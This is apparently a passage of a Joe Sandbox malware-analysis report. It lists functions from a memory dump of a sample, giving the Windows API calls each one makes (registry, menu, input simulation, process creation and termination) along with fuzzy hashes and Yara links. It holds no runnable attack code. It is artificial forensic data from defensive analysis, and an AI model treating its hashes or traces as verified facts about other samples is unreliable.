RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00A902BD
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00A902FD
RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00A90320
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00A90349
RegCloseKey.ADVAPI32(?,?,00000000), ref: 00A9038C
RegCloseKey.ADVAPI32(00000000), ref: 00A90399

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
String ID:
API String ID: 4046560759-0
Opcode ID: 5fad6199c4d8dbfdb03962c142fa850c7c4e4421bf4cc0412b5728aa472c36a3
Instruction ID: 43a07b17df4a16275a2058593328ab67f355208017fc63226b7ceb9659db02b1
Opcode Fuzzy Hash: 5fad6199c4d8dbfdb03962c142fa850c7c4e4421bf4cc0412b5728aa472c36a3
Instruction Fuzzy Hash: 0D511631208204AFCB14EB64C995EAFBBE9FF84354F04492DF5958B2A2DB31E945CB52

Function 00A95799 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 00A957FB
GetMenuItemCount.USER32(00000000), ref: 00A95832
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00A9585A
GetMenuItemID.USER32(?,?), ref: 00A958C9
GetSubMenu.USER32(?,?), ref: 00A958D7
PostMessageW.USER32(?,00000111,?,00000000), ref: 00A95928

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: Menu$Item$CountMessagePostString
String ID:
API String ID: 650687236-0
Opcode ID: faa514590885b40a4f6d145f6aaf647d2fd065be435b40c1bbbec856a4e5bfcd
Instruction ID: d93da07ebd96ca4dc6191afe3df33f77e301a266bf80897e463d8b5d9e200f04
Opcode Fuzzy Hash: faa514590885b40a4f6d145f6aaf647d2fd065be435b40c1bbbec856a4e5bfcd
Instruction Fuzzy Hash: 82513C35E00615AFDF11EFA4C956AAEBBF4EF48310F108065E845AB351CB74AE41DB90

Function 00A6EEEC Relevance: 9.2, APIs: 6, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00A6EF06
VariantClear.OLEAUT32(00000013), ref: 00A6EF78
VariantClear.OLEAUT32(00000000), ref: 00A6EFD3
_memmove.LIBCMT ref: 00A6EFFD
VariantClear.OLEAUT32(?), ref: 00A6F04A
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00A6F078

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType_memmove
String ID:
API String ID: 1101466143-0
Opcode ID: 04901f7f607b399c2b531f4e72bf27fb8776752f9171843108e50316416ed40c
Instruction ID: 6fd6255073818e5b2e359e7d813e1f1c8b6f4a81ca1f61a1f2291f675318491e
Opcode Fuzzy Hash: 04901f7f607b399c2b531f4e72bf27fb8776752f9171843108e50316416ed40c
Instruction Fuzzy Hash: 1D5168B5A00209EFCB14CF58D880AAAB7B8FF4C314B15856AE959DB341E734E911CBA0

Function 00A7220A Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00A72258
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00A722A3
IsMenu.USER32(00000000), ref: 00A722C3
CreatePopupMenu.USER32 ref: 00A722F7
GetMenuItemCount.USER32(000000FF), ref: 00A72355
InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00A72386

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup_memset
String ID:
API String ID: 3311875123-0
Opcode ID: 489431e581cc27eb605b5e2c687e1651ecbd5b4727833a891fea4ccdb8e8f086
Instruction ID: 45f7b6fd8ed9c3d401b8da37197fe79b0054622f97e3bb5ff6f1f699ea752e8a
Opcode Fuzzy Hash: 489431e581cc27eb605b5e2c687e1651ecbd5b4727833a891fea4ccdb8e8f086
Instruction Fuzzy Hash: 3651CD70600249EFDF21CF68CD88BAEBBF5BF05318F10C22AE859AB291D7748904CB51

Function 00A11765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 00A12612: GetWindowLongW.USER32(?,000000EB), ref: 00A12623

BeginPaint.USER32(?,?,?,?,?,?), ref: 00A1179A
GetWindowRect.USER32(?,?), ref: 00A117FE
ScreenToClient.USER32(?,?), ref: 00A1181B
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00A1182C
EndPaint.USER32(?,?), ref: 00A11876

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: PaintWindow$BeginClientLongRectScreenViewport
String ID:
API String ID: 1827037458-0
Opcode ID: 9f92903ce398e080c078aad13ecafd9f4688dd93a6ce7c310e3c290018eab252
Instruction ID: c8b19eae3d32cb88a863c01d0d1069e64406da1eee068f085318b9d2f5d4d48c
Opcode Fuzzy Hash: 9f92903ce398e080c078aad13ecafd9f4688dd93a6ce7c310e3c290018eab252
Instruction Fuzzy Hash: 734192715047409FD710DF64CC84FBA7BF8EB45724F144629FAA5C72A1C7309886EB61

Function 00A9B69E Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(00AD57B0,00000000,01114B18,?,?,00AD57B0,?,00A9B5A8,?,?), ref: 00A9B712
EnableWindow.USER32(00000000,00000000), ref: 00A9B736
ShowWindow.USER32(00AD57B0,00000000,01114B18,?,?,00AD57B0,?,00A9B5A8,?,?), ref: 00A9B796
ShowWindow.USER32(00000000,00000004,?,00A9B5A8,?,?), ref: 00A9B7A8
EnableWindow.USER32(00000000,00000001), ref: 00A9B7CC
SendMessageW.USER32(?,0000130C,?,00000000), ref: 00A9B7EF

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: b21620284c6524716b13600f3c1ef2f1c1a2538b213976324dd918ae44255efc
Instruction ID: 870e2d558c1b12aed66b6e4fffbcdc0856ca763c53787c7f309b602e01054559
Opcode Fuzzy Hash: b21620284c6524716b13600f3c1ef2f1c1a2538b213976324dd918ae44255efc
Instruction Fuzzy Hash: 5B416634701240AFDF25CFA4E599B947BE1FF85310F1842B9F9489F6A2CB31A856CB61

Function 00A8709E Relevance: 9.1, APIs: 6, Instructions: 97COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,?,?,?,?,00A84E41,?,?,00000000,00000001), ref: 00A870AC

Part of subcall function 00A839A0: GetWindowRect.USER32(?,?), ref: 00A839B3

GetDesktopWindow.USER32 ref: 00A870D6
GetWindowRect.USER32(00000000), ref: 00A870DD
mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00A8710F

Part of subcall function 00A75244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00A752BC

GetCursorPos.USER32(?), ref: 00A8713B
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00A87199

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
String ID:
API String ID: 4137160315-0
Opcode ID: b55e3e6e0dd7660d8db6eb20ed3c4d702ae7af635a004fd9083f3b52e49592e7
Instruction ID: f2cffe2622999e03248cd8e36d1179cd1f96d88391901135a90272ba7f960012
Opcode Fuzzy Hash: b55e3e6e0dd7660d8db6eb20ed3c4d702ae7af635a004fd9083f3b52e49592e7
Instruction Fuzzy Hash: 5A31A372605305AFD720EF54DC49A9FB7A9FF88314F10051AF58997191CB74EA05CB92

Function 00A68879 Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00A680A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00A680C0
Part of subcall function 00A680A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00A680CA
Part of subcall function 00A680A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00A680D9
Part of subcall function 00A680A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00A680E0
Part of subcall function 00A680A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00A680F6

GetLengthSid.ADVAPI32(?,00000000,00A6842F), ref: 00A688CA
GetProcessHeap.KERNEL32(00000008,00000000), ref: 00A688D6
HeapAlloc.KERNEL32(00000000), ref: 00A688DD
CopySid.ADVAPI32(00000000,00000000,?), ref: 00A688F6
GetProcessHeap.KERNEL32(00000000,00000000,00A6842F), ref: 00A6890A
HeapFree.KERNEL32(00000000), ref: 00A68911

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: a81229fc1620534544a8bf07520a4654aa442c5323d95423e75541b14711ffac
Instruction ID: 91fbf825bdc665cd62ff4ecd329c49379c79dd5a07b207ab1575e8bbe5cde196
Opcode Fuzzy Hash: a81229fc1620534544a8bf07520a4654aa442c5323d95423e75541b14711ffac
Instruction Fuzzy Hash: 0F119D72601209EFDB10DBE4DC09BBE777CEB45311F204229E995D7110DB3A9911DB60

Function 00A685B1 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00A685E2
OpenProcessToken.ADVAPI32(00000000), ref: 00A685E9
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00A685F8
CloseHandle.KERNEL32(00000004), ref: 00A68603
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00A68632
DestroyEnvironmentBlock.USERENV(00000000), ref: 00A68646

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: 9382b83447d0472cff66512c5a1eae49469c5bd6adff9aa9ce3322228cf889e1
Instruction ID: 63dbf28e0eac900819e19b3315d48321264bb597f5fea592d4cc3983908b0021
Opcode Fuzzy Hash: 9382b83447d0472cff66512c5a1eae49469c5bd6adff9aa9ce3322228cf889e1
Instruction Fuzzy Hash: D6114776600249AFDF01CFE8DD49BDA7BBDEB08344F044165FE05A2160DA768E61AB60

Function 00A6B790 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00A6B7B5
GetDeviceCaps.GDI32(00000000,00000058), ref: 00A6B7C6
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00A6B7CD
ReleaseDC.USER32(00000000,00000000), ref: 00A6B7D5
MulDiv.KERNEL32(000009EC,?,00000000), ref: 00A6B7EC
MulDiv.KERNEL32(000009EC,?,?), ref: 00A6B7FE

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: d1bb53e3451d892ac6f9166184fd496fc19cf239fd8c73f406cd6c0bf7be6ee5
Instruction ID: bcf348c09f6a32a92121b02fd218389c4cbeacbc22c95d702e9e655de29a0058
Opcode Fuzzy Hash: d1bb53e3451d892ac6f9166184fd496fc19cf239fd8c73f406cd6c0bf7be6ee5
Instruction Fuzzy Hash: 6D018475E00309BFEB109BE69D45A5EBFB8EB48311F104076FA04E7291DA309C11CFA0

Function 00A30162 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 00A30193
MapVirtualKeyW.USER32(00000010,00000000), ref: 00A3019B
MapVirtualKeyW.USER32(000000A0,00000000), ref: 00A301A6
MapVirtualKeyW.USER32(000000A1,00000000), ref: 00A301B1
MapVirtualKeyW.USER32(00000011,00000000), ref: 00A301B9
MapVirtualKeyW.USER32(00000012,00000000), ref: 00A301C1

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: 8b50999612536d084d99b6e0d2ad88fd1e76f8b3473e980c53ebd0e2d0261573
Instruction ID: 8571afdef0a435f469f09d3a0592aab2ea2de060ea2597868992f5cd24c25936
Opcode Fuzzy Hash: 8b50999612536d084d99b6e0d2ad88fd1e76f8b3473e980c53ebd0e2d0261573
Instruction Fuzzy Hash: FE016CB09017597DE3008F5A8C85B52FFB8FF19354F00411BA15C8B941C7F5A864CBE5

Function 00A753E9 Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00A753F9
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00A7540F
GetWindowThreadProcessId.USER32(?,?), ref: 00A7541E
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00A7542D
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00A75437
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00A7543E

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: b885656995a7bb2025402458b65bec3fdb45e26564ce461694dc02e6f927200a
Instruction ID: 3fa0b417e31ee0148d0fe867c3f1d9aee0fd08c2918ead875099120f4a09d707
Opcode Fuzzy Hash: b885656995a7bb2025402458b65bec3fdb45e26564ce461694dc02e6f927200a
Instruction Fuzzy Hash: 57F01D32641658BFE7219BA29C0DEAF7A7CEBC6B11F00016AFA05D10519AA51A4286B5

Function 00A77230 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 00A77243
EnterCriticalSection.KERNEL32(?,?,00A20EE4,?,?), ref: 00A77254
TerminateThread.KERNEL32(00000000,000001F6,?,00A20EE4,?,?), ref: 00A77261
WaitForSingleObject.KERNEL32(00000000,000003E8,?,00A20EE4,?,?), ref: 00A7726E

Part of subcall function 00A76C35: CloseHandle.KERNEL32(00000000,?,00A7727B,?,00A20EE4,?,?), ref: 00A76C3F

InterlockedExchange.KERNEL32(?,000001F6), ref: 00A77281
LeaveCriticalSection.KERNEL32(?,?,00A20EE4,?,?), ref: 00A77288

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: a032b9657c9c268578b36b7d528394177211636460a161dbf838e393fdb48c05
Instruction ID: 8c1dfec548127b6497472bbd1fadc8f87e5a13d326609f0038f3f07f8b111113
Opcode Fuzzy Hash: a032b9657c9c268578b36b7d528394177211636460a161dbf838e393fdb48c05
Instruction Fuzzy Hash: 23F05E76640612EFDB125BA4ED4CADF7729EF55702B204633F603D10A1CF766812CB90

Function 00A68992 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 00A6899D
UnloadUserProfile.USERENV(?,?), ref: 00A689A9
CloseHandle.KERNEL32(?), ref: 00A689B2
CloseHandle.KERNEL32(?), ref: 00A689BA
GetProcessHeap.KERNEL32(00000000,?), ref: 00A689C3
HeapFree.KERNEL32(00000000), ref: 00A689CA

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: dde481d8d359a3831b8a09ea1ab353fde0c88d5038f54a51d747f7786c7c3c75
Instruction ID: b87b868f65ef464f00875746a5eb77f1e94c91d45b22da51660a4200e809ec4c
Opcode Fuzzy Hash: dde481d8d359a3831b8a09ea1ab353fde0c88d5038f54a51d747f7786c7c3c75
Instruction Fuzzy Hash: A0E0527A204505FFDA019FF5EC0C95ABB69FB89762B608632F329C5470CF369462DB90

Function 00A885ED Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00A88613
CharUpperBuffW.USER32(?,?), ref: 00A88722
VariantClear.OLEAUT32(?), ref: 00A8889A

Part of subcall function 00A77562: VariantInit.OLEAUT32(00000000), ref: 00A775A2
Part of subcall function 00A77562: VariantCopy.OLEAUT32(00000000,?), ref: 00A775AB
